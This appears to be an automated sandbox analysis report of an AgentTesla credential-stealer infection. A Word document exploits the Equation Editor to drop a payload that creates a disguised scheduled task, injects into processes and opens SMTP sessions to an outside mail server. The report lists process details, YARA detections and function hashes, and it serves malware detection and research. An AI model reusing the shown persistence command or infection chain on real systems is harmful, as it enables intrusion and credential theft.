Feb 4, 2021 09:05:19.042757988 CET	16	IN	Data Raw: 70 6f d1 00 00 0a 14 fe 03 0d 09 2c 22 02 28 c5 00 00 0a 07 6f c5 00 00 0a 72 42 0d 00 70 6f d1 00 00 0a 73 59 03 00 06 6f d2 00 00 0a 00 00 00 07 6f c5 00 00 0a 72 52 0d 00 70 6f d1 00 00 0a 14 fe 03 13 04 11 04 2c 22 02 28 c5 00 00 0a 07 6f c5 Data Ascii: po,"(orBposYoorRpo,"(orRpos\|oornpo,"(ornposoo(o(o(o(o(o(

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Feb 4, 2021 09:06:19.233006954 CET	587	49166	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Feb 4, 2021 09:06:19.233616114 CET	49166	587	192.168.2.22	198.54.122.60	EHLO 813435
Feb 4, 2021 09:06:19.424916029 CET	587	49166	198.54.122.60	192.168.2.22	250-MTA-05.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 4, 2021 09:06:19.425992012 CET	49166	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 4, 2021 09:06:19.617299080 CET	587	49166	198.54.122.60	192.168.2.22	220 Ready to start TLS
Feb 4, 2021 09:06:25.943409920 CET	587	49167	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Feb 4, 2021 09:06:25.943824053 CET	49167	587	192.168.2.22	198.54.122.60	EHLO 813435
Feb 4, 2021 09:06:26.134624958 CET	587	49167	198.54.122.60	192.168.2.22	250-MTA-05.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 4, 2021 09:06:26.134938955 CET	49167	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 4, 2021 09:06:26.325604916 CET	587	49167	198.54.122.60	192.168.2.22	220 Ready to start TLS
Feb 4, 2021 09:06:34.091142893 CET	587	49169	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Feb 4, 2021 09:06:34.092901945 CET	49169	587	192.168.2.22	198.54.122.60	EHLO 813435
Feb 4, 2021 09:06:34.284837008 CET	587	49169	198.54.122.60	192.168.2.22	250-MTA-05.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 4, 2021 09:06:34.287007093 CET	49169	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 4, 2021 09:06:34.477701902 CET	587	49169	198.54.122.60	192.168.2.22	220 Ready to start TLS
Feb 4, 2021 09:06:43.423887014 CET	587	49170	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Feb 4, 2021 09:06:43.424370050 CET	49170	587	192.168.2.22	198.54.122.60	EHLO 813435
Feb 4, 2021 09:06:43.615233898 CET	587	49170	198.54.122.60	192.168.2.22	250-MTA-05.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 4, 2021 09:06:43.615542889 CET	49170	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 4, 2021 09:06:43.806044102 CET	587	49170	198.54.122.60	192.168.2.22	220 Ready to start TLS
Feb 4, 2021 09:06:51.183046103 CET	587	49171	198.54.122.60	192.168.2.22	220 PrivateEmail.com Mail Node
Feb 4, 2021 09:06:51.183553934 CET	49171	587	192.168.2.22	198.54.122.60	EHLO 813435
Feb 4, 2021 09:06:51.374852896 CET	587	49171	198.54.122.60	192.168.2.22	250-MTA-05.privateemail.com 250-PIPELINING 250-SIZE 81788928 250-ETRN 250-AUTH PLAIN LOGIN 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 STARTTLS
Feb 4, 2021 09:06:51.375190973 CET	49171	587	192.168.2.22	198.54.122.60	STARTTLS
Feb 4, 2021 09:06:51.566253901 CET	587	49171	198.54.122.60	192.168.2.22	220 Ready to start TLS

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 948 Parent PID: 584

General

Start time:	09:04:36
Start date:	04/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f770000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2288 Parent PID: 584

General

Start time:	09:04:37
Start date:	04/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powiuytrewasfdfghjkl.exe PID: 260 Parent PID: 2288

General

Start time:	09:05:03
Start date:	04/02/2021
Path:	C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe
Imagebase:	0xf0000
File size:	1079808 bytes
MD5 hash:	AA1F1EEBD208B4A2BC51CBD86C0E4FB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2144135612.00000000033C4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2143227299.00000000021E1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2143895989.00000000031E9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2143255573.0000000002216000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: schtasks.exe PID: 2904 Parent PID: 260

General

Start time:	09:05:05
Start date:	04/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\gDgbkskgY' /XML 'C:\Users\user\AppData\Local\Temp\tmpE966.tmp'
Imagebase:	0x6d0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: powiuytrewasfdfghjkl.exe PID: 2956 Parent PID: 260

General

Start time:	09:05:06
Start date:	04/02/2021
Path:	C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\powiuytrewasfdfghjkl.exe
Imagebase:	0xf0000
File size:	1079808 bytes
MD5 hash:	AA1F1EEBD208B4A2BC51CBD86C0E4FB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2397959095.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2398572608.00000000023FE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2398572608.00000000023FE000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2398959067.00000000026E9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2398959067.00000000026E9000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2398468934.0000000002331000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: powiuytrewasfdfghjkl.exe PID: 260 Parent PID: 2288 powiuytrewasfdfghjkl.exeCOMMON

Executed Functions

Function 002B9DF0, Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c463b7f291c6f5036747fcdb2070559c3193045a547b8ac432e9f9add19d1e2
Instruction ID: 6cc5fcefb9fb9de515457a13b951cd2321d326662e7c894428811a1aebdcf263
Opcode Fuzzy Hash: 2c463b7f291c6f5036747fcdb2070559c3193045a547b8ac432e9f9add19d1e2
Instruction Fuzzy Hash: BB9124B0E102098FCB04DFE9D480AEEBBF6AF89315F64856AD618AB355D7309981CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002B1CE0, Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33cf0a6ffad4d1592ce776f86e2f472868331d74c502e6c0854a5a60f4d50532
Instruction ID: c17e98ff94bb4972736a7a7abd585059ec95f737255a84c89c922298cf1fc120
Opcode Fuzzy Hash: 33cf0a6ffad4d1592ce776f86e2f472868331d74c502e6c0854a5a60f4d50532
Instruction Fuzzy Hash: AA9148B0D102198FDF14DFA9C850BEEBBF6BF89355F948169D608AB204DB305AA5CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002BD29D, Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 246c6c7d8291e84d9365417cd5881bd34e324976bc34e53271542f72dd34267f
Instruction ID: fd6638c44ad41dbf607f2d3bea6b416d8df42a79f5d6886ad999decb54db9fad
Opcode Fuzzy Hash: 246c6c7d8291e84d9365417cd5881bd34e324976bc34e53271542f72dd34267f
Instruction Fuzzy Hash: 717165B4D29208CFDB04CFA9D4847EDBBF6EB4A340F24A02AD009B7241E774A995CF15

Uniqueness

Uniqueness Score: -1.00%

Function 002B1C91, Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c732c93b7c2558aeccf43c34f27a5c9142e91b1b9a286da4e6652c55c980bae
Instruction ID: dfb8afd8b658bb0eb291b79d8952c2c43db4ecb9206ed8ffa6698d534e259d18
Opcode Fuzzy Hash: 5c732c93b7c2558aeccf43c34f27a5c9142e91b1b9a286da4e6652c55c980bae
Instruction Fuzzy Hash: 40715B70E102198FDF14DFB9C8507EEBBF6AF89344F9485A9D508A7244DB305AA1CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002BAE64, Relevance: 1.8, APIs: 1, Instructions: 329processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002BB137

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 15fc61b425a35185d06c4bb2649fc055c680ebe03f41da1508c86ba3644361ba
Instruction ID: a5ebfc77662853746b52bbbd7c102e05371852bf0a0e8a6b8c1772ef60a71394
Opcode Fuzzy Hash: 15fc61b425a35185d06c4bb2649fc055c680ebe03f41da1508c86ba3644361ba
Instruction Fuzzy Hash: E4C13570D1022A8FDF21CFA4C881BEEBBB1BF49304F1495A9D859B7240DB749A95CF85

Uniqueness

Uniqueness Score: -1.00%

Function 002BAE70, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002BB137

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d429d17036f30d92f25613f673e211689a7c9031568fa9a7148e31fd9bbadbbd
Instruction ID: e73c2be0883310759ddadc9166d40221f91ba5a1bb69291b570ba1990938a1c4
Opcode Fuzzy Hash: d429d17036f30d92f25613f673e211689a7c9031568fa9a7148e31fd9bbadbbd
Instruction Fuzzy Hash: ACC13570D1022A8FDF21CFA4C841BEEBBB1BF49304F1095A9E859B7240DB749A95CF85

Uniqueness

Uniqueness Score: -1.00%

Function 002BAAD0, Relevance: 1.6, APIs: 1, Instructions: 122injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002BABAB

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: daa1c2026181fe5976e60fb7696b58c9388b6df5351a2fcec082a40b32acb04b
Instruction ID: 257f48591aa1c932f5ceb502e1ebb0b315cbfaf172bf7c2a63aa77d6ef21ccd1
Opcode Fuzzy Hash: daa1c2026181fe5976e60fb7696b58c9388b6df5351a2fcec082a40b32acb04b
Instruction Fuzzy Hash: 5041A8B4D012499FCF00CFA9D984AEEFBB1BB49304F24942AE815B7240D334AA55CB54

Uniqueness

Uniqueness Score: -1.00%

Function 002BAAD8, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002BABAB

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 75c52919679778f60ed48ed737c111dadb5fd297772e9c9e72b952fdb58edff5
Instruction ID: b00dbc484ae98568336842956edd8cd24409304ff5e0f6357c6173e6e190095d
Opcode Fuzzy Hash: 75c52919679778f60ed48ed737c111dadb5fd297772e9c9e72b952fdb58edff5
Instruction Fuzzy Hash: 1B41A9B4D012489FCF00CFA9D984AEEFBF1BB49304F24942AE819B7200D734AA55CF64

Uniqueness

Uniqueness Score: -1.00%

Function 002BAC32, Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002BACEA

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8c954590b4f04af0bbf70977c53646d704b0df121c6d2ea4b9ef81f72e0a2275
Instruction ID: f6c24fc9950cd7d41eaf7f633f9a8d3cb89a092b30b682be35b1effa62861dbe
Opcode Fuzzy Hash: 8c954590b4f04af0bbf70977c53646d704b0df121c6d2ea4b9ef81f72e0a2275
Instruction Fuzzy Hash: 8541C9B8D042589FCF10CFA9D884AEEFBB1BF49310F24942AE815B7200D735A916CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002BAC38, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002BACEA

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: f24bcab4ff9c5bf3682c755294ebafccefa12d76a89de7a2547f9ff845c10ac4
Instruction ID: b280b5e392cb32f53738cfd73ce4a4cba9afee65e33020916698631ee606aa6d
Opcode Fuzzy Hash: f24bcab4ff9c5bf3682c755294ebafccefa12d76a89de7a2547f9ff845c10ac4
Instruction Fuzzy Hash: CD41B9B8D002589FCF10CFA9D884AEEFBB5BB49310F24942AE815B7200D735A955CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 002BA9B0, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002BAA5A

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 4a4a3b7f7460abbe0d3eda45d946f50fba20ab5486c9316eca376a40ea07063b
Instruction ID: 8703e38689cf180a2d26af58af5e24f5f38765490033214930405d720ed746f2
Opcode Fuzzy Hash: 4a4a3b7f7460abbe0d3eda45d946f50fba20ab5486c9316eca376a40ea07063b
Instruction Fuzzy Hash: 5C4199B8D002589BCF10CFA9D984ADEFBB5FB49310F20A42AE815B7300D735A911CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 002BA878, Relevance: 1.6, APIs: 1, Instructions: 99threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 002BA92F

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 21417e8929ddc4b3b9f06bf8a50f15f8f557eba728c57a280467ac89ba07894d
Instruction ID: 4fbfdf637f1c4a9358fbb2f89947696c726f5342d29eddb18f04d259d6dc2bee
Opcode Fuzzy Hash: 21417e8929ddc4b3b9f06bf8a50f15f8f557eba728c57a280467ac89ba07894d
Instruction Fuzzy Hash: E441BCB4D012589FCB10CFA9D884AEEFBF1AF49314F24842AE859B7240D779AA45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002BA880, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 002BA92F

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 53573d24777ee300d919a5481b8bf2f513a398e077778238cb4d3fbc3a6fd7f8
Instruction ID: 4e6edc9aac91bc82eaaa16f4709f01d1a5de829ce8cda98f8cdfcdf1de84d41b
Opcode Fuzzy Hash: 53573d24777ee300d919a5481b8bf2f513a398e077778238cb4d3fbc3a6fd7f8
Instruction Fuzzy Hash: 1241CCB4D002589FCB10CFA9D884AEEFBF5BF49314F24842AE419B7200D739AA45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 002BA748, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 002BA7C6

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c31a220c4b1d8f5c347015c73c96010bf398701b74dd3f0c68728de817ac8c67
Instruction ID: 5405c1cdb7d384565cd4e252b4f14db55a372978c6b8ecf5d45cfbddeab052f9
Opcode Fuzzy Hash: c31a220c4b1d8f5c347015c73c96010bf398701b74dd3f0c68728de817ac8c67
Instruction Fuzzy Hash: 1A3199B4D112189FCF14CFA9D884ADEFBB5EB49314F24982AE815B7300D775A901CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0024D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2142858178.000000000024D000.00000040.00000001.sdmp, Offset: 0024D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b6f1e3183012673f04286e9ff2ef3f48512759c10873af22d43b33908f9a254
Instruction ID: 42013caa83456206834980fad2a9fad42bd14a927efe300a8d77d151d7ff2ad9
Opcode Fuzzy Hash: 8b6f1e3183012673f04286e9ff2ef3f48512759c10873af22d43b33908f9a254
Instruction Fuzzy Hash: C9210475614204DFCB18CF60D984B16BBA5FB88714F24C9ADE80A4B346C37BD867CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0024D006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2142858178.000000000024D000.00000040.00000001.sdmp, Offset: 0024D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7d04131170a02fa7ae38d79419620faff4661bb23d6676457d263096f16e43f
Instruction ID: c80e1f152202a007cafb20349fbee53833f463ca67ac16d0e45bca95a1f49fc8
Opcode Fuzzy Hash: a7d04131170a02fa7ae38d79419620faff4661bb23d6676457d263096f16e43f
Instruction Fuzzy Hash: A52162755083809FCB06CF24D994715BF71EB46314F28C5EAD8498F257C33AD85ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0023D1C5, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2142844823.000000000023D000.00000040.00000001.sdmp, Offset: 0023D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a222978bc4725166e4d89a7431805ef6997fc6f3696c6f45986404239250f3
Instruction ID: b7c59f9417251af0d3cff4bde38d8b7bf007e4a71ea15051b55bd6046005e189
Opcode Fuzzy Hash: e9a222978bc4725166e4d89a7431805ef6997fc6f3696c6f45986404239250f3
Instruction Fuzzy Hash: 0A01F7710243449BD7204F65E984B67BBDCEF41724F18C45AED480A283C374D850C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 0023D1C4, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2142844823.000000000023D000.00000040.00000001.sdmp, Offset: 0023D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 581f04393a25e83126bb91595c9bd84f0cf0146d7265c4817a8f3024e30f1c25
Instruction ID: 1464fef8dabde7801bdd129f26c393d1452873fd06d85ce3cde0bc222b762848
Opcode Fuzzy Hash: 581f04393a25e83126bb91595c9bd84f0cf0146d7265c4817a8f3024e30f1c25
Instruction Fuzzy Hash: 72F06272414244AFE7508E15E888B63FFD8EB91724F28C55AED485B287C378EC44CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002B3787, Relevance: 2.7, Strings: 2, Instructions: 154COMMON

Download Yara Rule

Strings

@2Em, xrefs: 002B3995
X!7, xrefs: 002B380C

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID:
String ID: @2Em$X!7
API String ID: 0-883521105
Opcode ID: 7175e77a44239630c771e86b740ff7f951208e4ad357ca2be9bfcffc2795b2fa
Instruction ID: 76fb757ae93eb5ce1a7d75fe454a6d44607fc910eecc21f8704d6cf4e61bb29f
Opcode Fuzzy Hash: 7175e77a44239630c771e86b740ff7f951208e4ad357ca2be9bfcffc2795b2fa
Instruction Fuzzy Hash: 9F51BDB49112498FEB48EFB9E845ADEBBF3AB8A304F04C939D0059B364DB745906CF51

Uniqueness

Uniqueness Score: -1.00%

Function 002B3798, Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

@2Em, xrefs: 002B3995
X!7, xrefs: 002B380C

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID:
String ID: @2Em$X!7
API String ID: 0-883521105
Opcode ID: 502dc98ba084041021416ef13f74ed68378158f869d4f96b33bf4d791b498018
Instruction ID: 774c862580f911f548b09f55c09dc841ee81ff5980e44b1a72f8cbf5c973cfa6
Opcode Fuzzy Hash: 502dc98ba084041021416ef13f74ed68378158f869d4f96b33bf4d791b498018
Instruction Fuzzy Hash: 4051CEB49112098FEB48EFB9E845A9EBBF3ABC9304F00C939D0049B364EB745905CF52

Uniqueness

Uniqueness Score: -1.00%

Function 000F77E7, Relevance: 1.8, Instructions: 1788COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2142700033.00000000000F2000.00000020.00020000.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000004.00000002.2142695643.00000000000F0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2142786189.00000000001B8000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9aaf6992085fc1e7c07bbe439ccd3b8dd2f220313827ffbb6df9086844f9a615
Instruction ID: d2d28dd28e558e1237ea36bc1d4c2827c4b530d323b3c67a8a24a5572e77f52b
Opcode Fuzzy Hash: 9aaf6992085fc1e7c07bbe439ccd3b8dd2f220313827ffbb6df9086844f9a615
Instruction Fuzzy Hash: B1E2167140E3C29FCB574F789DB11D17FB0AE6321831E04DBD4C18E5A3E2296A5ADB62

Uniqueness

Uniqueness Score: -1.00%

Function 002B55CA, Relevance: 1.4, Strings: 1, Instructions: 192COMMON

Download Yara Rule

Strings

g&l, xrefs: 002B5638

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID:
String ID: g&l
API String ID: 0-33182615
Opcode ID: b36aa6c8c5654ae081a68781c81b2ab0db88051cef94020bbb474b4af462947f
Instruction ID: 7e118104e6c658a32ca219d2a1bdca43fe98b64f2ffd09332cefb97db090435a
Opcode Fuzzy Hash: b36aa6c8c5654ae081a68781c81b2ab0db88051cef94020bbb474b4af462947f
Instruction Fuzzy Hash: 09A19FB0E25628DBDB64DFA9D985ACDFBF1EF48304F1081E5D15CA6209E7309A99CF04

Uniqueness

Uniqueness Score: -1.00%

Function 002B39E8, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0cca722a78d2ef95efeb219b886198566e501f49943c02997dc4870625c0937
Instruction ID: cb47ba0ca4a8858367e5965dd84c4e5b74e2d382c61418a45a8dfce401387e7d
Opcode Fuzzy Hash: b0cca722a78d2ef95efeb219b886198566e501f49943c02997dc4870625c0937
Instruction Fuzzy Hash: 6A4143B1E116588BEB2CCF6B8D44799F6F7AFC9300F14C1FA850CAA255DB7409858F15

Uniqueness

Uniqueness Score: -1.00%

Function 002B39D9, Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f4751ac241858388e33ab46439c426cf8c1c0f4b4567365d2510083f757722b
Instruction ID: 710c8e71e280d7340d486dec421c126a54dd3c5c05b00bbe47b19f2df2e11c4c
Opcode Fuzzy Hash: 4f4751ac241858388e33ab46439c426cf8c1c0f4b4567365d2510083f757722b
Instruction Fuzzy Hash: F44131B1E156548BEB2CCF6B8D5079AFAF3AFC9300F14C1FA854CAA255DB7009858F15

Uniqueness

Uniqueness Score: -1.00%

Function 002BD538, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2142891789.00000000002B0000.00000040.00000001.sdmp, Offset: 002B0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b81c61913d2a9d6b9c20b923afae45fdd4646126f1f92934737a70c9f361ce28
Instruction ID: 77c0a9c67f85e468e4b3b10b98214bb270c1331eb864f85b572f73af4696b482
Opcode Fuzzy Hash: b81c61913d2a9d6b9c20b923afae45fdd4646126f1f92934737a70c9f361ce28
Instruction Fuzzy Hash: EB117930D142198FCB24CFA9C848BEEBBF0AB4E345F14946AD411B3290DB788944DF68

Uniqueness

Uniqueness Score: -1.00%

Function 000F6F0E, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2142700033.00000000000F2000.00000020.00020000.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000004.00000002.2142695643.00000000000F0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2142786189.00000000001B8000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86581f832109ff263e939630d03d494fa7803d730443bf3cca7e6e8d9f4e5f97
Instruction ID: a72a8f01f3dcf6cf90e51a5c7221040485f90e14cf804c1ddc887a788b7be13c
